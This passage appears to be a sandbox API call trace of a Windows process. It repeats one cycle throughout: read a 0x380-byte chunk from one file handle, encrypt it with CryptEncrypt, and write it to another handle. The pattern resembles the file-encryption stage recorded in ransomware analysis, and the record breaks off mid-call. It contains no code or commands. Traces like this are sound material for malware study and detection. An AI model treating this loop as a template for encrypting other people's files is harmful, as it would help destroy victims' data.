1 [0258.483] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.483] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.483] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.483] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.483] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.483] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.483] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.484] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.484] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.484] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.484] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.484] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.484] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.485] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.485] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.485] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.485] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.485] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.486] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.486] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.486] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.486] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.486] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.486] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.486] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.487] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.487] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.487] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.487] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.487] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.488] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.488] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.488] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.488] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.488] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.488] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.489] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.489] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.489] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.491] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.491] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.491] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.491] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.491] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.491] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.491] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.491] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.491] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.492] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.492] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: 